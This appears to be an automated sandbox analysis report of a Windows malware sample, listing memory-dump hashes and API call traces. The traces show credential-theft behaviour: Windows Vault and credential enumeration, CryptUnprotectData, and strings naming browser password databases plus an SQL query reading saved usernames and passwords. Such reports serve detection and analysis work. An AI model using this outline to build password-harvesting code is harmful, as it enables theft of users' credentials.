                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522610508.000000000161D000.00000040.00000001.sdmp, Offset: 0161D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1c097fc63a04e136fcf83e2eabd5807d7d964daae9d4396e7e048285d0281e15
                                                                                                                                                                  • Instruction ID: af03d6e0531a22ba9784a0e986630e0a7b8f1f6d259ccc0f638e3a46931af1c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 1c097fc63a04e136fcf83e2eabd5807d7d964daae9d4396e7e048285d0281e15
                                                                                                                                                                  • Instruction Fuzzy Hash: EC11B176404280CFCB06CF54D9C4B16BF72FB88324F28C6A9D8050B75AC33AD45ACBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 707d818f100045568a466e100df3d2f5c0351ec6e40217f184867a9ba66f2197
                                                                                                                                                                  • Instruction ID: 26307fb577283b3172642385b0fa52f464fba16c00196749ffb024234ac2f795
                                                                                                                                                                  • Opcode Fuzzy Hash: 707d818f100045568a466e100df3d2f5c0351ec6e40217f184867a9ba66f2197
                                                                                                                                                                  • Instruction Fuzzy Hash: B8116D76504284DFDB12CF54D9C4B19BF61FB84324F28C6AAD8494B746C33AD44ACBA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
• API String ID:
• Opcode ID: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
• Instruction ID: 3b0ddaf07e37e6ec8088da353dd0bfc5b87b7a9f3bfbcb217b5914fbf923b385
• Opcode Fuzzy Hash: 66c17bffb1d1f19bcc81164d2b47de8a416589112ad8b15de9eba11185b1268f
• Instruction Fuzzy Hash: 2B11BB75504280DFCB02CF54D9C0B15BBA1FB84324F28C6A9D9494B756C33AD44ACB61
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.522765274.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4fd165d615cc9fe6bac0729f065a9cfc4c529efd83ef74c4f0e3b29a79a694c5
• Instruction ID: b92439288ae66e9147c09ba4b1ffe4f8b3776caae0ded5ab27357cd5e6b6a844
• Opcode Fuzzy Hash: 4fd165d615cc9fe6bac0729f065a9cfc4c529efd83ef74c4f0e3b29a79a694c5
• Instruction Fuzzy Hash: E411BF75504680DFDB12CF14D9C4B1AFF61FB84724F24C6AAD8494B746C33AD44ACBA2
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Executed Functions

APIs
• memset.MSVCRT ref: 004097B2
  • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 004097D9
  • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
  • Part of subcall function 004118EA: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,00409807,?,000000FF,00000000,00000104), ref: 004118FD
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00411914
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00411926
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00411938
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041194A
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0041195C
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtQueryObject), ref: 0041196E
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 00411980
  • Part of subcall function 004118EA: GetProcAddress.KERNEL32(NtResumeProcess), ref: 00411992
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040981A
• FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 00409843
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040984E
• _wcsicmp.MSVCRT ref: 004098B7
• _wcsicmp.MSVCRT ref: 004098CA
• _wcsicmp.MSVCRT ref: 004098DD
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 004098F1
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00409937
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00409946
• memset.MSVCRT ref: 00409964
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00409997
• _wcsicmp.MSVCRT ref: 004099B7
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 004099F7
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 594330280-3398334509
• Opcode ID: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
• Instruction ID: 2b0fa152ef01bef0fcdaafddb1ab82311fd8af30ec04a4c20003f9f52c8fe1fb
• Opcode Fuzzy Hash: 744fbf75455b6098578e480c8635837c5c89e79d09ece7b140be473bd29f90d8
• Instruction Fuzzy Hash: 7B815E71900219EFEF10EF95C885AAEBBB5FF44305F20806EF905B6292D7399E41CB54
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000), ref: 004443BD
• GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004443D2
• GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004443DF
• GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 004443EC
• GetProcAddress.KERNEL32(00000000,VaultFree), ref: 004443F9
• GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 00444406
• GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00444414
• GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044441D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
• API String ID: 2238633743-2107673790
• Opcode ID: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
• Instruction ID: bae3ddfd5a2cf1e2657d78bbfe85c411ed61fca9aeaa9a4901361c1bc58423a9
• Opcode Fuzzy Hash: 78ba4d5693d53eadcf9c8744485d997ab560c1e320cc44334ae31523dad5f6ee
• Instruction Fuzzy Hash: 5201E874940B44EFEB306F71CD09E07BAE4EF94B117118D2EE49A92A10D778E818CE54
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413442
• memset.MSVCRT ref: 00413457
• Process32FirstW.KERNEL32(?,?), ref: 00413473
• OpenProcess.KERNEL32(00000410,00000000,?,00000000,?,?), ref: 004134B8
• memset.MSVCRT ref: 004134DF
• GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413514
• GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0041352E
• CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00413580
• free.MSVCRT(-00000028), ref: 00413599
• Process32NextW.KERNEL32(?,0000022C), ref: 004135E2
• CloseHandle.KERNEL32(?,?,0000022C), ref: 004135F2
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
• String ID: QueryFullProcessImageNameW$kernel32.dll
• API String ID: 1344430650-1740548384
• Opcode ID: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
• Instruction ID: 336025cd3e57628a03d53de68a5eb917573850932ab3a304507e713d781e6372
• Opcode Fuzzy Hash: ed6fa7fbe2363a651f29f393370116b4659e51fbe7daf5e0a77eaee9eb31a363
• Instruction Fuzzy Hash: 3E518CB2C00118ABDB10DFA5DC84ADEF7B9AF95301F1040ABE508A3251DB799B84CF99
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00412880,*.*,?), ref: 004093A5
• FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00412880,*.*,?), ref: 004093C3
• wcslen.MSVCRT ref: 004093F3
• wcslen.MSVCRT ref: 004093FB
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileFindwcslen$FirstNext
• String ID:
• API String ID: 2163959949-0
• Opcode ID: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
• Instruction ID: fe44496fd245f22b3294f1be8fcbf5b62ffed3b59158e7af3f9261faba672c79
• Opcode Fuzzy Hash: bbfa88675e90f7cab1951949309c9f409910220031eaa870910243319b313dcd
• Instruction Fuzzy Hash: CA11E97240A7019FD7149B64E884A9B73DCEF45324F204A3FF459E31C1EB78AC008718
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindResourceW.KERNELBASE(?,?,?), ref: 004141ED
• SizeofResource.KERNEL32(?,00000000), ref: 004141FE
• LoadResource.KERNEL32(?,00000000), ref: 0041420E
• LockResource.KERNEL32(00000000), ref: 00414219
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Resource$FindLoadLockSizeof
• String ID:
• API String ID: 3473537107-0
• Opcode ID: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
• Instruction ID: 4db2b1a63d72691fd362fce079069d1f86e41d88e51d490a39d61a138898f27d
• Opcode Fuzzy Hash: ec51cf45041cf25647cccbc885ed45c86f25aef72003178a0d679bc8b0aad2a7
• Instruction Fuzzy Hash: A8019636A002156B8F155FA5DD4999F7FAAFFC67D0708803AF915CA221DB70C882C688
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00417F9B: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00417FC7
  • Part of subcall function 00417F9B: malloc.MSVCRT ref: 00417FD2
  • Part of subcall function 00417F9B: free.MSVCRT(?), ref: 00417FE2
  • Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004180ED
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00418115
• free.MSVCRT(00000000,?,00000000,?,00000000), ref: 0041811E
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
• Instruction ID: 44f72dfadcd4ed0e6b0cb1466d7c09a20078aec04da8d2fdb22fffa922359726
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e76693c67f0b4aa2a9f0ce93b5e4d32a4f514a6f71b86ff027121c958f9ef7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A215076800118BEEB21ABA4CC449EF7BBCAF09344F1540ABE641D7211EB784EC587A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004182A7
                                                                                                                                                                  • GetSystemInfo.KERNELBASE(00453D60,?,00000000,00442D20,?,?,?), ref: 004182B0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoSystemmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3558857096-0
                                                                                                                                                                  • Opcode ID: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
                                                                                                                                                                  • Instruction ID: 3c0be6fe3b5a6ffc89f5b68e380a6edd79d3b36df5ca7f17532ee32b6b8f0e73
                                                                                                                                                                  • Opcode Fuzzy Hash: e09057acdafeef912d39132da5cb39305370b204b8372ac2ca77995ca7410ec3
                                                                                                                                                                  • Instruction Fuzzy Hash: 86E09235E01A242BE7117F767C07BDB26948F8A38AF04407BF904DA253EA6CCD414ADE
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040B1BF: free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6
                                                                                                                                                                  • memset.MSVCRT ref: 004064B7
                                                                                                                                                                  • free.MSVCRT(00409BFD,00000000,?,00000000), ref: 004065AE
                                                                                                                                                                    • Part of subcall function 00405F0B: memcpy.MSVCRT ref: 00405F27
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$memcpymemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2037443186-0
                                                                                                                                                                  • Opcode ID: 87bb0912cc168f4427a637e20596dc9ec97740ebca6445c1b4761c6aceef0b63
                                                                                                                                                                  • Instruction ID: 9763a21b998b4320822d5df799fc1cad8e230cd1267682af71ec74f08d94d328
                                                                                                                                                                  • Opcode Fuzzy Hash: 87bb0912cc168f4427a637e20596dc9ec97740ebca6445c1b4761c6aceef0b63
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E026D71D002299BCB24DF65C8846EEB7B5FF48314F1584BAE84ABB381D7389A91CF54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00411EC2
                                                                                                                                                                  • wcsrchr.MSVCRT ref: 00411EDB
                                                                                                                                                                  • memset.MSVCRT ref: 0041202F
                                                                                                                                                                    • Part of subcall function 0040A94C: _wcslwr.MSVCRT ref: 0040AA14
                                                                                                                                                                    • Part of subcall function 0040A94C: wcslen.MSVCRT ref: 0040AA29
                                                                                                                                                                    • Part of subcall function 0040956D: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 004095A6
                                                                                                                                                                    • Part of subcall function 0040956D: wcslen.MSVCRT ref: 004095CC
                                                                                                                                                                    • Part of subcall function 0040956D: wcsncmp.MSVCRT(?,?,00000020,?,00000000,?), ref: 00409602
                                                                                                                                                                    • Part of subcall function 0040956D: memset.MSVCRT ref: 00409679
                                                                                                                                                                    • Part of subcall function 0040956D: memcpy.MSVCRT ref: 0040969A
                                                                                                                                                                    • Part of subcall function 0040ADD0: LoadLibraryW.KERNELBASE(pstorec.dll), ref: 0040ADE1
                                                                                                                                                                    • Part of subcall function 0040ADD0: GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 0040ADF4
                                                                                                                                                                    • Part of subcall function 004444B7: memcmp.MSVCRT ref: 0044455D
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F6A
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F7F
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410F94
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410FA9
                                                                                                                                                                    • Part of subcall function 00410F47: memset.MSVCRT ref: 00410FBE
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FE4
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00410FF5
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041102D
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 0041103B
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411074
                                                                                                                                                                    • Part of subcall function 00410F47: wcslen.MSVCRT ref: 00411082
                                                                                                                                                                  • memset.MSVCRT ref: 0041204B
                                                                                                                                                                  • memset.MSVCRT ref: 00412061
                                                                                                                                                                  • memset.MSVCRT ref: 0041207D
                                                                                                                                                                  • wcslen.MSVCRT ref: 004120C4
                                                                                                                                                                  • wcslen.MSVCRT ref: 004120D1
                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Sea Monkey,?,00000104), ref: 004121C5
                                                                                                                                                                  • memset.MSVCRT ref: 0041217E
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 004079D1
                                                                                                                                                                    • Part of subcall function 00407991: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 004079EA
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A23
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A3B
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A53
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A6B
                                                                                                                                                                    • Part of subcall function 00407991: memset.MSVCRT ref: 00407A83
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A8E
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407A9C
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407ACB
                                                                                                                                                                  • memset.MSVCRT ref: 00412241
                                                                                                                                                                  • memset.MSVCRT ref: 0041225B
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412275
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412283
                                                                                                                                                                  • memset.MSVCRT ref: 004122FD
                                                                                                                                                                  • memset.MSVCRT ref: 00412317
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412331
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041233F
                                                                                                                                                                  • memset.MSVCRT ref: 004123C2
                                                                                                                                                                  • memset.MSVCRT ref: 004123E0
                                                                                                                                                                  • memset.MSVCRT ref: 004123FE
                                                                                                                                                                  • memset.MSVCRT ref: 00412573
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407AD9
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B08
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B16
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B45
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B53
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B82
                                                                                                                                                                    • Part of subcall function 00407991: wcslen.MSVCRT ref: 00407B90
                                                                                                                                                                    • Part of subcall function 00407991: SetCurrentDirectoryW.KERNEL32(?), ref: 00407CAB
                                                                                                                                                                  • wcslen.MSVCRT ref: 0041245B
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412469
                                                                                                                                                                  • wcslen.MSVCRT ref: 004124AF
                                                                                                                                                                  • wcslen.MSVCRT ref: 004124BD
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412503
                                                                                                                                                                  • wcslen.MSVCRT ref: 00412511
                                                                                                                                                                  • _wcsicmp.MSVCRT ref: 004125DA
                                                                                                                                                                    • Part of subcall function 004442F9: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
                                                                                                                                                                    • Part of subcall function 004442F9: ??2@YAPAXI@Z.MSVCRT ref: 00444324
                                                                                                                                                                    • Part of subcall function 004442F9: memset.MSVCRT ref: 00444333
                                                                                                                                                                    • Part of subcall function 004442F9: ??3@YAXPAX@Z.MSVCRT ref: 00444356
                                                                                                                                                                    • Part of subcall function 004442F9: CloseHandle.KERNEL32(00000000), ref: 0044435D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcslen$memset$??2@??3@AddressByteCharCloseCredCurrentDirectoryEnumerateEnvironmentExpandFileHandleLibraryLoadMultiProcSizeStringsWide_wcsicmp_wcslwrmemcmpmemcpywcsncmpwcsrchr
                                                                                                                                                                  • String ID: %programfiles%\Sea Monkey$*.*$Chromium\User Data$Data\Profile$Google\Chrome SxS\User Data$Google\Chrome\User Data$Login Data$Opera$Opera Software\Opera Stable\Login Data$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat$Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe$Vivaldi\User Data\Default\Login Data$Yandex\YandexBrowser\User Data\Default\Login Data$wand.dat
                                                                                                                                                                  • API String ID: 2195781745-1743926287
                                                                                                                                                                  • Opcode ID: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
                                                                                                                                                                  • Instruction ID: 7a0d4c8da9719b4bd57d9e34dd235b5097b77d6fd782259e08ea59ad0a0aa82b
                                                                                                                                                                  • Opcode Fuzzy Hash: 0dfe16fee904680cb0bfa71703a20f26bea0553467f296cf69df4e43642452a8
                                                                                                                                                                  • Instruction Fuzzy Hash: 774293B2509344ABD720EBA5D985BDBB3ECBF84304F01092FF588D3191EBB8D545879A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
  • Part of subcall function 00403C8C: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CAB
  • Part of subcall function 00403C8C: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00403CBD
  • Part of subcall function 00403C8C: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040FF6D,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 00403CD1
  • Part of subcall function 00403C8C: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00403CFC
• SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF81
• GetModuleHandleW.KERNEL32(00000000,00414266,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040FF9A
• EnumResourceTypesW.KERNEL32 ref: 0040FFA1
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
• String ID: $/deleteregkey$/savelangfile
• API String ID: 2744995895-28296030
• Opcode ID: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
• Instruction ID: 58268879d1a8d32d9d01966b45afca8998e7ac275f8ef3c48d75c103cdcc3135
• Opcode Fuzzy Hash: f4a827cf65cbb4cb0b27562536f3745cfcd0fc63cfd5dde0fe9220dbb6d92dd4
• Instruction Fuzzy Hash: A8518F71508745AFDB20AFA2DC49A9FB7A8FF45344F40083EF684E2152DB79D8848B5A
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004060BC: _wcsicmp.MSVCRT ref: 004060ED
  • Part of subcall function 004063BB: memset.MSVCRT ref: 004064B7
• free.MSVCRT(00000000), ref: 00409E9F
  • Part of subcall function 00409755: _wcsicmp.MSVCRT ref: 0040976E
• memset.MSVCRT ref: 00409D85
  • Part of subcall function 00408F43: wcslen.MSVCRT ref: 00408F56
  • Part of subcall function 00408F43: memcpy.MSVCRT ref: 00408F75
• wcschr.MSVCRT ref: 00409DBD
• memcpy.MSVCRT ref: 00409DF1
• memcpy.MSVCRT ref: 00409E0C
• memcpy.MSVCRT ref: 00409E27
• memcpy.MSVCRT ref: 00409E42
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3849927982-2252543386
• Opcode ID: a83afb3fb1d886893dfdf5e60ec3ef205233330e3098ed3faae95944d2aa80c6
• Instruction ID: 4efc6fce7ce7295637414d4ef923d95a635c1e3a2e0485d2030de31f1e6ccd1f
• Opcode Fuzzy Hash: a83afb3fb1d886893dfdf5e60ec3ef205233330e3098ed3faae95944d2aa80c6
• Instruction Fuzzy Hash: 4051FE71D40209ABEB50EFA5DC45B9EB7B8AF54304F15403BB504B72D2EB78AD048B98
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004029C4
• CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004029DB
• CopyFileW.KERNEL32(?,?,00000000), ref: 004029FC
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00402A07
• memset.MSVCRT ref: 00402A20
• DeleteFileW.KERNEL32(?), ref: 00402C96
  • Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
  • Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
  • Part of subcall function 004080FD: GetTempFileNameW.KERNELBASE(?,004029F6,00000000,?), ref: 0040813D
• memset.MSVCRT ref: 00402A95
  • Part of subcall function 00408C93: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,000003FF,000003FF,00402B19,?,?,000003FF,00000000), ref: 00408CA5
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000000FF), ref: 00402B6E
  • Part of subcall function 00403BB9: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
  • Part of subcall function 00403BB9: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
  • Part of subcall function 00403BB9: FreeLibrary.KERNEL32(00000000), ref: 00403BFD
• memset.MSVCRT ref: 00402BF7
• memcpy.MSVCRT ref: 00402C0A
• MultiByteToWideChar.KERNEL32 ref: 00402C31
• LocalFree.KERNEL32(?), ref: 00402C3A
Strings
• chp, xrefs: 004029E6
• SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402A61
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Filememset$ByteCharMultiWide$FreeLibraryTemp$AddressChangeCloseCopyCreateDeleteDirectoryFindLoadLocalNameNotificationPathProcWindowsmemcpy
• String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
• API String ID: 1340729801-1844170479
• Opcode ID: 81020742f08cd979592eeacad5d893b131c1d3e65ead4c73e8d07300279ec837
• Instruction ID: 12325825b01e7d439ee1a457c4e284e7a4c6ca08c5b0c0223ff6c3e9a84d8d63
• Opcode Fuzzy Hash: 81020742f08cd979592eeacad5d893b131c1d3e65ead4c73e8d07300279ec837
• Instruction Fuzzy Hash: 61819172D00128ABDB11EBA5DC85AEE7778EF44314F1404BAF618F7291DB785F448B68
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040978A: memset.MSVCRT ref: 004097B2
